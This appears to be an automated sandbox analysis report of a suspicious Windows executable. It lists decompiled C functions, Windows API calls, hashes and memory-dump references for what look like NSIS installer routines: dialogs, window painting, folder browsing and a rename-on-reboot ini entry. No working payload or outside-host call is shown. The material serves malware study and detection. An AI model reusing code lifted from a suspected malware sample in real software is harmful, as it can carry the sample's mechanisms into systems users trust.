              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
              • String ID: H7B
              • API String ID: 184305955-2300413410
              • Opcode ID: ad2877bd5c4ea7cc256e3088b2b3c42cb38b7d734cc530d92285f8f03c2605ef
              • Instruction ID: 474293f91904d384e756f83d9200f154ec1a476d51ccc5c10f5d023ba508d08e
              • Opcode Fuzzy Hash: ad2877bd5c4ea7cc256e3088b2b3c42cb38b7d734cc530d92285f8f03c2605ef
              • Instruction Fuzzy Hash: 17C1B1B1600604FBCB216F61EE85E2A7BB8EB84705F40497EF741B51F1CB3958529B2E
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00404651, Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
              Download Yara Rule
              C-Code - Quality: 91%
              			E00404651(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x421714 =  *0x421714 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E004044F9(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x428200;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404900(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a268, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a268, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
						goto L27;
					} else {
						_t116 =  *0x422720 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004044B4(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004048DC();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x42923c - 4 + _t75 * 4);
				}
				_t76 =  *0x42a2b8 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404602;
				if(_t110 != 2) {
					_v8 = E004045C8;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E00404492(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E00404492(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004044B4( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004044C7(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a274 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x421714 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x421714 = 0;
				return 0;
			}


















              0x00404663
              0x00404790
              0x004047ed
              0x004047f1
              0x004048be
              0x004048c0
              0x004048c0
              0x004048c6
              0x004048c6
              0x004048c9
              0x00000000
              0x004048d0
              0x004047ff
              0x00404805
              0x0040480f
              0x0040481a
              0x0040481d
              0x00404820
              0x0040482b
              0x0040482e
              0x00404835
              0x00404842
              0x00404853
              0x00404859
              0x00404861
              0x0040486f
              0x00404875
              0x00404875
              0x00404835
              0x0040487f
              0x00000000
              0x0040488a
              0x0040488e
              0x0040489e
              0x0040489e
              0x004048a4
              0x004048b0
              0x004048b0
              0x00000000
              0x004048b4
              0x0040487f
              0x0040479b
              0x00000000
              0x004047ad
              0x004047b2
              0x004047b8
              0x00000000
              0x00000000
              0x004047e1
              0x004047e3
              0x004047e8
              0x00000000
              0x004047e8
              0x0040479b
              0x00404669
              0x0040466c
              0x00404671
              0x00404682
              0x00404682
              0x0040468a
              0x0040468d
              0x00404691
              0x00404694
              0x00404698
              0x0040469b
              0x0040469e
              0x004046a1
              0x004046a8
              0x004046aa
              0x004046aa
              0x004046b4
              0x004046c1
              0x004046cb
              0x004046d0
              0x004046d3
              0x004046d8
              0x004046ef
              0x004046f6
              0x00404709
              0x0040470c
              0x00404720
              0x00404727
              0x0040472c
              0x00404731
              0x00404731
              0x0040473f
              0x0040474d
              0x0040475f
              0x00404764
              0x00404774
              0x00404776
              0x00000000

              APIs
              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046EF
              • GetDlgItem.USER32 ref: 00404703
              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404720
              • GetSysColor.USER32(?), ref: 00404731
              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040473F
              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040474D
              • lstrlenW.KERNEL32(?), ref: 00404752
              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040475F
              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404774
              • GetDlgItem.USER32 ref: 004047CD
              • SendMessageW.USER32(00000000), ref: 004047D4
              • GetDlgItem.USER32 ref: 004047FF
              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404842
              • LoadCursorW.USER32(00000000,00007F02), ref: 00404850
              • SetCursor.USER32(00000000), ref: 00404853
              • LoadCursorW.USER32(00000000,00007F00), ref: 0040486C
              • SetCursor.USER32(00000000), ref: 0040486F
              • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040489E
              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B0
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
              • String ID: KXCJDFJSKF$N
              • API String ID: 3103080414-3315232752
              • Opcode ID: 109bfc3f4ae54697b435cbc64e06ea45ef072446bfa87c0e9d4d0ff38833786b
              • Instruction ID: 9740ae806e86bdd9a5d1823962a5ed5927fd13c96e858ba55e5d087808badbab
              • Opcode Fuzzy Hash: 109bfc3f4ae54697b435cbc64e06ea45ef072446bfa87c0e9d4d0ff38833786b
              • Instruction Fuzzy Hash: EE6193B1900209FFDB10AF60DD85E6A7B69FB84314F00853AFA05B62D1D7789D51CF98
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00406188, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00406188(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x426de8 = 0x55004e;
				 *0x426dec = 0x4c;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x4275e8
					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
						_t53 = _t52 + 0x10;
						E00406579(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a274 + 0x128)));
						_t12 = E00406032(0x4275e8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004060B5(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405F97(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405F97(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405FED(_t24 + _t46, 0x4269e8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E004060E4(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00406032(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















              0x00406188
              0x00406191
              0x00406198
              0x004061a2
              0x004061b6
              0x004061de
              0x004061e5
              0x004061e9
              0x004061ed
              0x0040620d
              0x00406214
              0x0040621e
              0x0040622b
              0x00406230
              0x00406235
              0x00406239
              0x00406248
              0x0040624a
              0x00406257
              0x0040625b
              0x004062f6
              0x00000000
              0x00406271
              0x0040627e
              0x004062a2
              0x004062a6
              0x004062c5
              0x004062c9
              0x004062c9
              0x004062cb
              0x004062d4
              0x004062df
              0x004062ea
              0x004062f0
              0x00000000
              0x004062f0
              0x004062a8
              0x004062ab
              0x004062b6
              0x004062b2
              0x004062b4
              0x004062b5
              0x004062b5
              0x004062bd
              0x004062bf
              0x00000000
              0x004062bf
              0x00406289
              0x0040628f
              0x00000000
              0x0040628f
              0x0040625b
              0x00406239
              0x004061b8
              0x004061c3
              0x004061cc
              0x004061d0
              0x00000000
              0x00000000
              0x004061d0
              0x00406301

              APIs
              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406323,?,?), ref: 004061C3
              • GetShortPathNameW.KERNEL32 ref: 004061CC
                • Part of subcall function 00405F97: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA7
                • Part of subcall function 00405F97: lstrlenA.KERNEL32(00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD9
              • GetShortPathNameW.KERNEL32 ref: 004061E9
              • wsprintfA.USER32 ref: 00406207
              • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406242
              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406251
              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406289
              • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 004062DF
              • GlobalFree.KERNEL32 ref: 004062F0
              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F7
                • Part of subcall function 00406032: GetFileAttributesW.KERNELBASE(00000003,004030AB,C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe,80000000,00000003), ref: 00406036
                • Part of subcall function 00406032: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406058
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
              • String ID: %ls=%ls$[Rename]$mB$uB$uB
              • API String ID: 2171350718-2295842750
              • Opcode ID: 1370db5916d635a3eaa8287a3a8568cfa6b7ad2c16bbfcffe5a040e030d3314f
              • Instruction ID: 390cd084817c4cf50855a9647c10840f2cfe6cacc919d204b2e4a530669b52c0
              • Opcode Fuzzy Hash: 1370db5916d635a3eaa8287a3a8568cfa6b7ad2c16bbfcffe5a040e030d3314f
              • Instruction Fuzzy Hash: FB312231200715BBC2207B659E49F5B3A9CEF41754F16007FBA42F62C2EA3CD82586BD
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
              Download Yara Rule
              C-Code - Quality: 90%
              			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a274;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













              0x0040100a
              0x00401039
              0x00401047
              0x0040104d
              0x00401051
              0x0040105b
              0x00401061
              0x00401064
              0x004010f3
              0x00401089
              0x0040108c
              0x004010a6
              0x004010bd
              0x004010cc
              0x004010cf
              0x004010d5
              0x004010d9
              0x004010e4
              0x004010ed
              0x004010ef
              0x004010ef
              0x00401100
              0x00401105
              0x0040110d
              0x00401110
              0x00401112
              0x00401118
              0x0040111f
              0x00401126
              0x00401130
              0x00401142
              0x00401156
              0x00401160
              0x00401165
              0x00401165
              0x00401110
              0x0040116e
              0x00000000
              0x00401178
              0x00401010
              0x00401013
              0x00401015
              0x0040101f
              0x0040101f
              0x00000000

              APIs
              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
              • BeginPaint.USER32(?,?), ref: 00401047
              • GetClientRect.USER32 ref: 0040105B
              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
              • FillRect.USER32 ref: 004010E4
              • DeleteObject.GDI32(?), ref: 004010ED
              • CreateFontIndirectW.GDI32(?), ref: 00401105
              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
              • SelectObject.GDI32(00000000,?), ref: 00401140
              • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
              • SelectObject.GDI32(00000000,00000000), ref: 00401160
              • DeleteObject.GDI32(?), ref: 00401165
              • EndPaint.USER32(?,?), ref: 0040116E
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
              • String ID: F
              • API String ID: 941294808-1304234792
              • Opcode ID: dccf31a386450978f6a467bb1a2dd48e69ee6b81a70d351153b8e89f54c6a922
              • Instruction ID: 0f43a076eda42f240989ba3bcaaa7122e90b548761b3bfdbbaf4c3cca9648f62
              • Opcode Fuzzy Hash: dccf31a386450978f6a467bb1a2dd48e69ee6b81a70d351153b8e89f54c6a922
              • Instruction Fuzzy Hash: CF418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7389A55DFA4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00404983, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
              Download Yara Rule
              C-Code - Quality: 78%
              			E00404983(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x422720;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405B86(0x3fb, _t146);
					E004067EB(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405B86(0x3fb, _t146);
							if(E00405F19(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E0040653C(0x421718, _t146);
							_t87 = E00406931(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040653C(0x421718, _t146);
								_t89 = E00405EBC(0x421718);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x421718) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405E5D(0x421718);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x421718) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404E20(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
									E00404E08(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x421708);
									} else {
										E00404D3F(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a324 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004044B4(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x423738 == _t158) {
									E004048DC();
								}
								 *0x423738 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x423748;
							_v60 = E00404CD9;
							_v56 = _t146;
							_v68 = E00406579(_t146, 0x423748, _t167, 0x421f20, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405E11(_t146);
								_t125 =  *((intOrPtr*)( *0x42a274 + 0x11c));
								if( *((intOrPtr*)( *0x42a274 + 0x11c)) != 0 && _t146 == L"C:\\Users\\jones\\AppData\\Local\\Temp") {
									E00406579(_t146, 0x423748, _t167, 0, _t125);
									if(lstrcmpiW(0x428200, 0x423748) != 0) {
										lstrcatW(_t146, 0x428200);
									}
								}
								 *0x423738 =  *0x423738 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405E88(_t146) != 0 && E00405EBC(_t146) == 0) {
						E00405E11(_t146);
					}
					 *0x429238 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00404492(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404492(_t167);
					E004044C7(_t166);
					_t138 = E00406931(8);
					if(_t138 == 0) {
						L53:
						return E004044F9(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}













































              0x00404983
              0x00404989
              0x0040498f
              0x0040499c
              0x004049aa
              0x004049ad
              0x004049b5
              0x004049bb
              0x004049bb
              0x004049c7
              0x004049ca
              0x00404a38
              0x00404a3f
              0x00404b16
              0x00404b1d
              0x00404b2c
              0x00404b2c
              0x00404b30
              0x00404b3a
              0x00404b47
              0x00404b49
              0x00404b49
              0x00404b57
              0x00404b5e
              0x00404b65
              0x00404b68
              0x00404ba4
              0x00404ba6
              0x00404bac
              0x00404bb1
              0x00404bb5
              0x00404bb7
              0x00404bb7
              0x00404bd3
              0x00000000
              0x00404bd5
              0x00404bd8
              0x00404be6
              0x00404bec
              0x00404bed
              0x00404bf0
              0x00404bf3
              0x00000000
              0x00404bf3
              0x00404b6a
              0x00404b6c
              0x00404b70
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00404b72
              0x00404b72
              0x00404b7f
              0x00404b84
              0x00000000
              0x00000000
              0x00404b88
              0x00404b8a
              0x00404b8a
              0x00404b93
              0x00404b95
              0x00404b9a
              0x00404b9d
              0x00404ba2
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00404ba2
              0x00404bff
              0x00404c09
              0x00404c0c
              0x00404c0f
              0x00404c16
              0x00404c16
              0x00404c18
              0x00404c18
              0x00404c1d
              0x00404c1f
              0x00404c27
              0x00404c2e
              0x00404c30
              0x00404c3b
              0x00404c3b
              0x00404c30
              0x00404c4b
              0x00404c55
              0x00404c5d
              0x00404c78
              0x00404c5f
              0x00404c68
              0x00404c68
              0x00404c5d
              0x00404c7d
              0x00404c82
              0x00404c87
              0x00404c90
              0x00404c90
              0x00404c99
              0x00404c9b
              0x00404c9b
              0x00404ca7
              0x00404caf
              0x00404cb9
              0x00404cb9
              0x00404cbe
              0x00000000
              0x00404cbe
              0x00404b68
              0x00404b1f
              0x00404b26
              0x00000000
              0x00000000
              0x00000000
              0x00404b26
              0x00404a45
              0x00404a4e
              0x00404a68
              0x00404a6d
              0x00404a77
              0x00404a7e
              0x00404a8a
              0x00404a8d
              0x00404a90
              0x00404a97
              0x00404a9f
              0x00404aa2
              0x00404aa6
              0x00404aad
              0x00404ab5
              0x00404b0f
              0x00404ab7
              0x00404ab8
              0x00404abf
              0x00404ac9
              0x00404ad1
              0x00404ade
              0x00404af2
              0x00404af6
              0x00404af6
              0x00404af2
              0x00404afb
              0x00404b08
              0x00404b08
              0x00404ab5
              0x00000000
              0x00404a6d
              0x00404a5b
              0x00000000
              0x00000000
              0x00404a61
              0x00000000
              0x004049cc
              0x004049d9
              0x004049e2
              0x004049ef
              0x004049ef
              0x004049f6
              0x004049fc
              0x00404a05
              0x00404a08
              0x00404a0b
              0x00404a13
              0x00404a16
              0x00404a19
              0x00404a1f
              0x00404a26
              0x00404a2d
              0x00404cc4
              0x00404cd6
              0x00404a33
              0x00404a36
              0x00000000
              0x00404a36
              0x00404a2d

              APIs
              • GetDlgItem.USER32 ref: 004049D2
              • SetWindowTextW.USER32(00000000,?), ref: 004049FC
              • SHBrowseForFolderW.SHELL32(?), ref: 00404AAD
              • CoTaskMemFree.OLE32(00000000), ref: 00404AB8
              • lstrcmpiW.KERNEL32(KXCJDFJSKF,00423748,00000000,?,?), ref: 00404AEA
              • lstrcatW.KERNEL32(?,KXCJDFJSKF), ref: 00404AF6
